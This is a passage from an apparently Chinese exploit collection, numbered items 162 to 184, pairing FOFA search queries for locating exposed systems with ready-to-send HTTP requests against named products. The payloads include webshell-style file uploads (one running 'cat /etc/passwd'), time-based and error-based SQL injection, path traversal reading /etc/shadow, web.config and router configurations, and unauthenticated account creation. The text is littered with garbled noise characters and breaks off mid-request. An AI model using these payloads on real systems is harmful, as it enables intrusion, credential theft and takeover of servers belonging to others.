4 t+ J s: r5 H% @: z<?xml version="1.0" encoding="utf-8"?># {* p3 `1 `8 D7 B4 j1 W5 I
<soap:Envelope xmlns:xsi="
6 j# J. m- V2 F# F0 e8 G% }! c: Chttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema", n" M6 U0 F- x$ T) f
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 x3 g' L9 S6 V3 n l<soap:Body>
b- c# x- H9 E* B* Y% y9 r7 Y<UploadResume xmlns="http://tempuri.org/">
* g; t0 A6 B% n) |# T4 C; d<ip>1</ip># u0 Y1 o: ~# H# j8 Q9 T/ P$ |7 C u# d
<fileName>../../../../dizxdell.aspx</fileName>
; e9 H/ ^! o3 P<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
) e! Z1 y3 M7 g2 |8 e: f1 a<tag>3</tag>
) p+ n2 r+ g* L2 j% F5 ]</UploadResume>
4 L5 S) G. w+ C- e! v</soap:Body>
; g5 ~! K8 w3 i7 R& W/ d</soap:Envelope>
5 P& B/ g8 g# _$ |2 f3 x' X4 ]- ?0 \$ {
/ C& I$ d" n( p1 I
http://x.x.x.x/dizxdell.aspx6 W7 {) R% l" E* S$ _& q- f5 y
9 h5 r7 X! ~9 }
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
6 u( ?+ J. p4 Y, m* r9 `" ~- mFOFA: app="和丰山海-数字标牌"
; r; ~# E9 v8 T9 ?$ X9 H3 ]/ d- r7 LPOST /QH.aspx HTTP/1.1
0 c9 t5 M3 \- ~. xHost: x.x.x.x
9 g% X& h8 q; B+ D5 S4 u; S# F3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, I4 o9 L [; o7 q1 s
Connection: close
2 A+ `0 ]; k% ~! [4 C- }Content-Length: 583# F" [ i2 l9 z% Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
- H, `9 V5 _; E1 t5 _; ?- j0 DAccept-Encoding: gzip
/ G( v0 O( x, {" b3 p3 w* m# G7 M `4 i3 B0 g
------WebKitFormBoundaryeegvclmyurlotuey
* X/ S5 m4 F! d5 k- g1 b/ a$ jContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
8 J, U) g" Q* N- b' S6 ZContent-Type: application/octet-stream
: J& x9 ?7 I1 t+ q: c
# M( P9 T% D1 F<% response.write("ujidwqfuuqjalgkvrpqy") %>& c3 v) E! o& @1 E8 Q* e' t
------WebKitFormBoundaryeegvclmyurlotuey3 @( B" g) G# P6 y# r1 E5 A
Content-Disposition: form-data; name="action"4 Q& I( L# u& ]' o
) b/ o: p O, h" W0 r5 d
upload
0 ^5 Z. w& t0 u# J, @------WebKitFormBoundaryeegvclmyurlotuey; Z3 P$ P! n% |6 V! g$ @3 _' X6 C" h
Content-Disposition: form-data; name="responderId"
( G2 q6 `7 y# a; k
- n& V ]: V$ Z u2 Y* H* FResourceNewResponder
% r9 m$ E. M" L9 g% J------WebKitFormBoundaryeegvclmyurlotuey
, F' v) `4 ~ [1 M9 J+ c# l @; aContent-Disposition: form-data; name="remotePath"- \2 N& }- |& C9 H0 }4 Q( R
9 @5 z h$ d% Q0 N4 n2 p5 I
/opt/resources- @: s/ N" j3 T Z, o9 K2 F
------WebKitFormBoundaryeegvclmyurlotuey--
6 E% ]3 b4 ]2 F1 V
; l! K5 R1 L9 l0 i1 W# P: N l5 g4 Y6 D# {+ d! _* K% o. @/ u
http://x.x.x.x/opt/resources/kjuhitjgk.aspx3 V9 y( b; o+ D7 u0 W8 L1 E# M/ E+ ` J9 P
0 w |6 ? {- Z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
8 S; T* E5 q. Y/ u' NFOFA: icon_hash="-795291075"
) W* w; K P% s0 Y6 CPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1! a% A* {( ?. j" l! k. r
Host: x.x.x.x, I; Y/ |* f9 {: k3 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 m* T Z" ^" y. s- p2 z' RConnection: close
9 @* h/ O( J& d i- fContent-Length: 2937 [1 s3 z% _1 Z) }! N
Accept: */*
' R) s6 U% h" q# s9 OAccept-Encoding: gzip, deflate
. O A2 `+ X% e, j' _) C; _7 e: pAccept-Language: zh-CN,zh;q=0.9- g5 S# \% g2 q) L0 d# Y
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod: h% Q+ U5 C: p5 |9 U* N
' y7 o: O3 h1 q+ M; S------iiqvnofupvhdyrcoqyuujyetjvqgocod. m4 f: ^7 R [1 A/ p% G1 F
Content-Disposition: form-data; name="name". ?9 j" W$ s5 d5 h
9 L! y, a: c0 L. R. ^- b' n9 Z1.php
2 C! n, k+ ^/ T. ^" k# f+ K. v8 \------iiqvnofupvhdyrcoqyuujyetjvqgocod) j( Q/ B- J7 i+ H! {
Content-Disposition: form-data; name="upfile"; filename="1.php"
6 S, p$ m* N' w4 N+ QContent-Type: image/jpeg
$ u/ U, ^. x) j6 {& ]( A. `9 h" [2 y2 p$ k1 o& \% Z
rvjhvbhwwuooyiioxega3 b( ^4 e9 b7 h
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ i/ \& ] A4 Z0 [, J1 K; y) L" N
% C& ~$ S0 V, h, K. y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- @. A: z3 |% f+ l
FOFA: title="智慧综合管理平台登入"
4 x7 o9 N1 Y# \7 \) l3 a3 U) APOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.11 u p3 }$ x5 D! a
Host: x.x.x.x" f! d8 ^* e6 r8 D/ e2 F/ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.03 b: u( J$ p9 {. M2 ~
Content-Length: 288 t" K* V9 Q, I' |9 ~/ h. L
Accept: application/json, text/javascript, */*; q=0.01% z" j, X1 {# ]3 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
A2 C6 H2 A+ ?+ H" R, O+ KConnection: close
' `! b& ~: {. S& Z" X. mContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl1 x2 g5 x+ l5 q# f" b
X-Requested-With: XMLHttpRequest
! ~) i+ }0 E3 \ F# o$ }Accept-Encoding: gzip
0 Z3 R7 M' Y8 s. i7 g: w! k) m1 T% g. Z! _( |
------dqdaieopnozbkapjacdbdthlvtlyl' R* @# ~3 v8 k- b) `' E# Y
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"1 s# Y4 ]0 r U: k/ t
Content-Type: image/jpeg9 g1 {; t, w* z- H
$ D- c9 k" ]7 o: T% n% r/ q; h
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
9 f. D' M( E) ?0 r" c+ Z------dqdaieopnozbkapjacdbdthlvtlyl--! ^5 Q) X/ c' `1 c# ? p
9 C2 C! S: ~- Y# K8 k% b3 L, n( @- h- e2 H S
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
: u1 T: @: q; [( D8 s3 d S3 {: H
165. OrangeHRM 3.3.3 SQL 注入
5 U1 I3 e5 q7 N- D" GCVE-2024-36428
# w1 w4 H$ j+ Q" sFOFA: app="OrangeHRM-产品"
% l8 X+ t& o' u# @4 p) gURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
4 U& B2 `1 j2 a5 ?; u c9 ]* g& F: @0 ?, U7 L" h9 i* @- G5 c4 d
6 _+ ~& F# b5 d0 c( y4 B166. 中成科信票务管理平台SeatMapHandler SQL注入6 b1 E2 ~& s5 `
FOFA:body="技术支持:北京中成科信科技发展有限公司"
- D# @, z, |* Q( ?9 C* r9 JPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1; x5 T* V/ z8 R0 W: s' j
Host:
# `/ L. F+ P$ L2 n5 b4 aPragma: no-cache; k, @5 n! l! V4 N# n5 Q
Cache-Control: no-cache0 E$ @- @9 f2 M8 f- S
Upgrade-Insecure-Requests: 1
4 P+ V6 G4 j- {. R5 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
5 D" j" P3 U$ I- k+ M BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 g1 b* v9 N% C% c* H
Accept-Encoding: gzip, deflate
* p" q% F4 ~( V* x- SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# E0 n' ^# D8 _4 mCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
; O$ K8 j6 r0 U5 Q) a- w5 EConnection: close2 \% E! |- f) w1 _. V
Content-Type: application/x-www-form-urlencoded
, A$ q' ~! r% K; r. w) CContent-Length: 898 i" m! g6 e1 Z& E
& {2 B+ ^, s' Z- U2 }Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE) c8 g ]5 Q4 v. O& k5 y4 d
. C1 x" s J2 b8 R5 S6 N- z; q9 H! K' s% c% g7 T5 T8 C# j. {' h
167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ Q! d) t; _5 b0 `8 AFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
* G# y, {- }; v' r( GGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1, L$ A, X$ R% f2 V- m" j
Host:% Y' d- R( a4 y' h$ N) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ t* j" k; g5 y2 S) e! I1 uContent-Type: application/x-www-form-urlencoded4 D: _: b# j( @9 N" `+ W
Accept-Encoding: gzip, deflate/ i: K7 ^ u3 }% E/ W; [
Accept: */*6 _& N( B! Y q) \( U* H
Connection: keep-alive
* |9 h8 W3 \# r1 k; ^( l) U( t0 @
. I! B. A0 y4 P+ a! z; [168. 宏景EHR OutputCode 任意文件读取
* t$ O$ Q- P0 v: QFOFA:app="HJSOFT-HCM"
: [. L+ H. B% ?) `* v1 RGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.12 y) x! R. K6 w5 |! `3 A% ?: }
Host: your-ip' A! \5 M5 n: @3 K% O: X% u; I- Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36. F& z3 m- B- [$ w
Content-Type: application/x-www-form-urlencoded
( ~7 s& r/ o7 L0 F( l# W& w: NConnection: close
1 I) }5 ]+ s& U
- G0 V+ C; Z7 }8 n( V9 W5 l8 Z7 X6 k8 s Y3 K ^8 C7 ?' L. s2 z
* L, c" O+ j6 u( y4 q0 G- c& {( H
169. 宏景EHR downlawbase SQL注入2 B0 X; D j; I/ B- a! [
FOFA:app="HJSOFT-HCM"
" t6 B; p- @* r* U% x9 \ M/ Y9 YGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
, N. g- q9 z6 fHost: your-ip' h- }$ M2 a5 i* o: ^- c2 e. i1 a( G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- O+ A( B; j; s5 b' v0 ~6 k
Accept: */*
: H. H- f# r. R8 f/ |8 f- hAccept-Encoding: gzip, deflate
( N' y" B" q2 G2 F) `% V" eConnection: close* p/ ~# D$ @ W$ {+ g! m
# F3 z9 h* z$ O
1 |# N$ r7 E, v, M3 f2 g
- U% R5 U* [ z7 N170. 宏景EHR DisplayExcelCustomReport 任意文件读取$ C3 b8 A' Z$ C
FOFA:body="/general/sys/hjaxmanage.js". S5 g0 ^+ s. m0 Y7 W
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1# f+ q( i, R% }: Z8 }) e
Host: balalanengliang
' z; f- K8 l: V: c& U) p; xUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" B! u% L( f/ ~6 \
Content-Type: application/x-www-form-urlencoded3 o2 F; Z* q" V
& `: I; N) l$ w) F( _) B# Ufilename=../webapps/ROOT/WEB-INF/web.xml
* q$ J; |$ x4 R+ c! t4 ], y( F
2 p3 t) i- {6 K6 R
; x4 d7 \- K1 v; b% d. i/ h171. 通天星CMSV6车载定位监控平台 SQL注入) F. u) @$ x- Y) F2 _& H" j
FOFA:body="/808gps/"
7 `7 k6 m2 W# W, x% U1 M7 jGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.16 Q& I% f$ u+ }- t' u8 D2 t
Host: your-ip, ? z+ \. n2 J4 v: c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* g; X2 ~& W' f2 _, v) ]% T! E
Accept: */*
: Z; ? P/ @" a7 g3 d' ~3 A2 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# w; o0 e' J- ~8 F+ P& s' `5 H
Accept-Encoding: gzip, deflate# P* z1 ?& A4 T7 e8 A: S/ R
Connection: close% Q3 |6 j: {0 c8 h' J t
6 w" \! y9 A6 D; W0 U, W% d5 k
+ m* a6 t0 C \, G% Y" W* T$ c$ x j; J: l0 _
172. DT-高清车牌识别摄像机任意文件读取; M( c8 N5 g# Q" V) F
FOFA:app="DT-高清车牌识别摄像机"& E4 E7 H# o# n7 w$ v
GET /../../../../etc/passwd HTTP/1.10 M1 } [2 h# j. N5 d
Host: your-ip
J9 \- _2 w. \/ s$ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' H! Q+ s( V/ b/ H7 o& I
Accept-Encoding: gzip, deflate- t: B9 ^) }/ l
Accept: */*( R, j. Q; |3 x
Connection: keep-alive+ b' |3 f! I* _* t3 i' i- M
8 l7 G1 H4 G8 P& K% e6 }( Y N& b+ F
! j! {8 S3 r+ ]- P; g( @7 ^
173. Check Point 安全网关任意文件读取
2 w* S1 u+ ]$ e9 _( Q S+ WCVE-2024-24919, r8 ^, \6 C+ C& z
FOFA:app="Check_Point-SSL-Network-Extender"
6 T8 U" `4 F, j' T0 o9 | PPOST /clients/MyCRL HTTP/1.14 z6 v2 g$ q) R c2 J
Host: your-ip ?; O3 L$ W: S0 `/ e8 h: E6 @
Content-Type: application/x-www-form-urlencoded
1 U+ O" o* I* O7 P3 |+ V: I$ T q3 ]7 d Y
aCSHELL/../../../../../../../etc/shadow9 }4 X9 m2 R) W. {7 ^
% D q& }% O6 w8 y
9 K7 n6 M, V2 `% `- y; u1 z) |( j" t9 J( z; B* q4 p) w
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 [, Q5 v# F$ q" n) YFOFA:app="金和网络-金和OA"
1 f, U @& O0 J0 s4 s" OGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
6 i5 r5 \! E9 Y& {' pHost: your-ip
2 i& i, _! K5 F$ B9 c% c- lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Z4 n$ [* n8 z- p2 A- n9 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 C4 d. I& V+ h, G& _% q3 p8 C
Accept-Encoding: gzip, deflate, br
, y2 }3 u6 k, T- n3 S9 fAccept-Language: zh-CN,zh;q=0.9
. ?% W5 `- ^5 U5 L& M9 M4 [) CConnection: close- Y# c# a% f+ k+ A% x' Q( e! v
1 s( e/ h+ `4 \: S
' c$ b( a/ q( G
; ~" Q9 ~: R: L5 O5 K8 y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
2 A& q' f) }" q9 c5 Q: JFOFA:app="金和网络-金和OA"
; ^) }3 d3 d& c+ zGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
& e# c1 [$ u! }9 s7 `# `Host:, \7 C! b! ]& g, \1 O
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 T5 b+ q) _" n6 L MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 }: ]5 ?2 ^/ C) d V7 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 c1 Z% f W7 d; M. c3 SAccept-Encoding: gzip, deflate
2 X/ _/ g! ?; S/ q" N$ h4 t: _: SConnection: close# G {( L0 A$ e
Upgrade-Insecure-Requests: 12 I% y, b( h! C1 S; \
& H m7 q5 F L5 U
' D% q: F; f9 L$ ^
176. 电信网关配置管理系统 rewrite.php 文件上传8 c! B- p2 T- W7 N9 h# }: y
FOFA:body="img/login_bg3.png" && body="系统登录"
4 @7 y6 @, b2 X# w* A6 w+ e; LPOST /manager/teletext/material/rewrite.php HTTP/1.1& p& V q, Z* f" ]" P/ ?
Host: your-ip
( z7 U$ a7 E e ~1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( J5 S ^* p ]$ f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT. }; N8 ?9 X: t6 X& i( I" ^# K0 Z
Connection: close5 h" }& `3 B4 g/ A3 c7 r; F# \
* J Y& y& e* T8 |: w------WebKitFormBoundaryOKldnDPT
( ^6 m! l1 Q' I6 C) j2 e1 {Content-Disposition: form-data; name="tmp_name"; filename="test.php"" a1 n4 ]$ m- Y0 q$ w; q: h* b4 {
Content-Type: image/png
* H1 n+ O. J. ~6 k5 ] 4 j( V, X* W" t* E6 F* L9 g, J
<?php system("cat /etc/passwd");unlink(__FILE__);?>% g8 B6 g. j" d
------WebKitFormBoundaryOKldnDPT
0 b- w1 q" Z( y& W9 M& ]. r" L9 `Content-Disposition: form-data; name="uploadtime") X+ T1 N; d( P) ]
/ i: o- S& N! N0 J K9 M
2 R0 z k7 p" Y, d m, E
------WebKitFormBoundaryOKldnDPT--
/ ^+ _6 T+ k* r' a1 e& D% m) {, q- X7 i
4 _2 @' j- n0 w7 H# L, Q$ X
" E) Z8 Y# W$ m8 M$ n177. H3C路由器敏感信息泄露
1 ]+ x' j7 ?9 a/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
$ K8 Y$ j7 i2 `- Q! g |0 L) @- q/userLogin.asp/../actionpolicy_status/../M60.cfg" |' |8 l' ~6 Z6 E0 O/ K
/userLogin.asp/../actionpolicy_status/../GR8300.cfg' P! ?/ d( e @* Z/ t0 i9 K3 \
/userLogin.asp/../actionpolicy_status/../GR5200.cfg! `+ K4 X6 z2 s: r: o6 F
/userLogin.asp/../actionpolicy_status/../GR3200.cfg0 D; q: N. R9 [2 y( Q2 D, C# X
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
9 o$ y, G0 T c( V0 \6 k/ b/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' ~- }. |1 T3 T. ?/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg- r7 |8 _ w. `, W+ |$ K
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
& c$ ^; c/ ?+ y3 A2 H/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" Q: S/ @. ?: O* y+ I1 |/userLogin.asp/../actionpolicy_status/../ER5200.cfg% m5 k1 W- G( z B/ \
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
0 b3 P8 D8 N) q4 \/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
2 _9 k7 H/ D6 u* a/userLogin.asp/../actionpolicy_status/../ER3260.cfg4 _/ ]4 k4 |0 E$ f' E( ?9 v
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
9 e# N# _& s) U/userLogin.asp/../actionpolicy_status/../ER3200.cfg
+ C) }$ Y( P1 D% Y6 g# }/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg0 k- K9 ~% m f$ Q7 M: j
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
8 [% @$ _9 j8 z/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg7 V- h7 h4 T* Y& P5 X% w9 I4 i
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
2 V* }1 B- x- r* {& i/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg7 j" u# C9 F7 D# X$ x" U6 U" C5 H
: X [- i' {+ r# a* {' x! E
1 X/ G2 e( x: \7 L0 ^178. H3C校园网自助服务系统-flexfileupload-任意文件上传
3 a( ?/ ~5 f+ j' h5 u c7 [- ]% KFOFA:header="/selfservice"4 N8 m; K0 b7 `* B$ s! W- H
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
8 {1 J) s1 l$ r5 ~Host:4 V6 d7 z, i, ^% ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* Q( p4 O' ]: y0 ~. Y# {Content-Length: 252/ \4 M/ a% z! ^" ]! _+ |
Accept-Encoding: gzip, deflate
. T$ N& A* W/ dConnection: close+ u N P/ u# g7 u3 [. Z% N, C& l
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l% X2 j3 ?+ \8 N( B! \7 V
-----------------aqutkea7vvanpqy3rh2l
4 S8 p' `9 W2 c* f9 mContent-Disposition: form-data; name="12234.txt"; filename="12234"1 e; ~- y3 u7 \5 w" f6 C7 ~
Content-Type: application/octet-stream$ A" x6 V% K2 ~8 H( v, z
Content-Length: 255; v5 E0 E) H: y$ t8 [
- ?* d9 E+ F0 j3 w- ?& q/ O12234
, q; q1 t" |, o2 _9 l: U* ^( c-----------------aqutkea7vvanpqy3rh2l-- f0 S# M$ Q* A
. e! F: G$ U' T! ]( c( ~8 l1 x2 }# Q3 W( b$ E Q* u9 M3 V
GET /imc/primepush/%2e%2e/flex/12234.txt6 i; V& w$ H- t2 T2 T6 X% s
5 ] w6 B3 M1 ^7 F7 ?
( i2 j v$ ~/ j1 @# Q1 b2 c4 D# E0 X- a) v179. 建文工程管理系统存在任意文件读取. K' p3 s$ r) V. Z
POST /Common/DownLoad2.aspx HTTP/1.1' L' z& T- x) G7 N+ o- h: D# l
Host: {{Hostname}}2 @1 A: l' e! ]
Content-Type: application/x-www-form-urlencoded/ l( X a( t1 [! E+ o- }- w6 ]
User-Agent: Mozilla/5.0
4 R6 D1 z! F" M7 O8 N: Y3 _7 A1 R" X1 v" c' T# ]/ ? K
path=../log4net.config&Name=2 |4 a# O: g3 \/ t4 A' y9 M. i, T
Y2 i1 q" r+ h1 q9 ~& }
0 o# ~0 ]9 F- h+ m0 P) p" Y0 }180. 帮管客 CRM jiliyu SQL注入* E! s) j: n3 m1 m! ^1 p# A+ h
FOFA:app="帮管客-CRM"
; x7 \& n" F! \% O1 BGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
+ a. z. a* R3 p4 J5 dHost: your-ip
4 w0 X2 c( B( d2 E, i2 Z% lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: j5 s' j9 u* l. v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: W/ b k! U4 t/ ?+ Z Y% MAccept-Encoding: gzip, deflate
! G" r4 q) z; _0 Z# ?Accept-Language: zh-CN,zh;q=0.91 C. c M# h; w* ]: I- {
Connection: close- l$ z0 F: V. T. a+ q; n; O
3 ~9 \8 A* I7 _2 E0 A7 C8 ]
6 S0 k* X, w5 J {
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 y8 I5 c' \! MFOFA:"PDCA/js/_publicCom.js"& W) O# p) F, s( ]
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
/ r3 F( t# k" }3 l. e- RHost: your-ip
6 f( a9 z6 s2 c5 C- r" _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 Z5 z2 C; G* O& a" s m! P/ Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
z b- l6 i/ h9 F% i X5 ZAccept-Encoding: gzip, deflate, br* ]( j5 U2 c1 r/ [3 r
Accept-Language: zh-CN,zh;q=0.9
! B- s* z7 y# D# @! i7 F0 gConnection: close6 z/ o5 C, f, u% K3 J
Content-Type: application/x-www-form-urlencoded
7 l- o. X/ B) O, l' Z) a' w- y6 r: L
# q/ M3 |) `8 r* e$ _
% D8 h1 z0 ?9 _0 q Daction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
; `3 K# G3 C4 ]% }9 [# y, N. F! y& ?1 V
Z5 n% T3 u2 l( g6 U& p+ {$ s+ ^9 i182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建 k6 |' H8 a6 |) r ?0 ]8 L, J
FOFA:"PDCA/js/_publicCom.js"* q! m4 Q9 V" i0 A
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
# b+ ~( y1 [; @' K, Z! b- @1 V/ CHost: your-ip
, K X V! j1 J A( K5 C4 N4 m# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36- d8 m2 T `, J# c7 P3 P/ f$ j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ _$ y" _, t2 I+ o0 q4 }Accept-Encoding: gzip, deflate, br, P, B) G; U% h) `. C0 j* @
Accept-Language: zh-CN,zh;q=0.9
2 c8 L6 l0 H/ D: AConnection: close/ c% w2 v5 t( A* ?6 p
Content-Type: application/x-www-form-urlencoded# {/ k4 x' k+ l8 _
, s' _# H. `" Q/ ~: i) g
3 r$ E# N- X8 Z4 q+ jusername=test1234&pwd=test1234&savedays=1) e4 E3 U0 C' W( w, @" ~
5 q5 V1 C) o1 Z( X
8 l# r8 y) \. }0 n; x- ]
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: L" F1 @# T- H" r& l
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面") D9 V$ ~8 }$ {, y0 {' V. F
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.12 e6 u0 Q7 H3 n' j& R
Host: your-ip
* Z2 X+ X! l9 u# A$ i2 s1 R$ ^User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, S, w! `% m. T1 I" x0 x
Accept-Charset: utf-8
3 S' W3 r0 @( O& S% o* H6 k6 dAccept-Encoding: gzip, deflate
& N* h+ o4 @( t. pConnection: close' a+ ?6 p+ \$ b4 T
; B! l- {9 u- D
" ?0 x$ n/ o7 p. X+ j4 I% R' O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
4 @+ H3 g- z8 h( O( Y$ q" S. JFOFA:server="SunFull-Webs"
) N2 c; |7 T" d' O2 f" uPOST /soap/AddUser HTTP/1.1
1 g& \9 \: k1 n \0 W& u' Y; F9 XHost: your-ip
7 E. Q! Y. t$ h& vAccept-Encoding: gzip, deflate. }; d# J7 U3 z7 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
- V( [/ P- g+ Q$ Q4 J4 t5 NAccept: application/xml, text/xml, */*; q=0.01
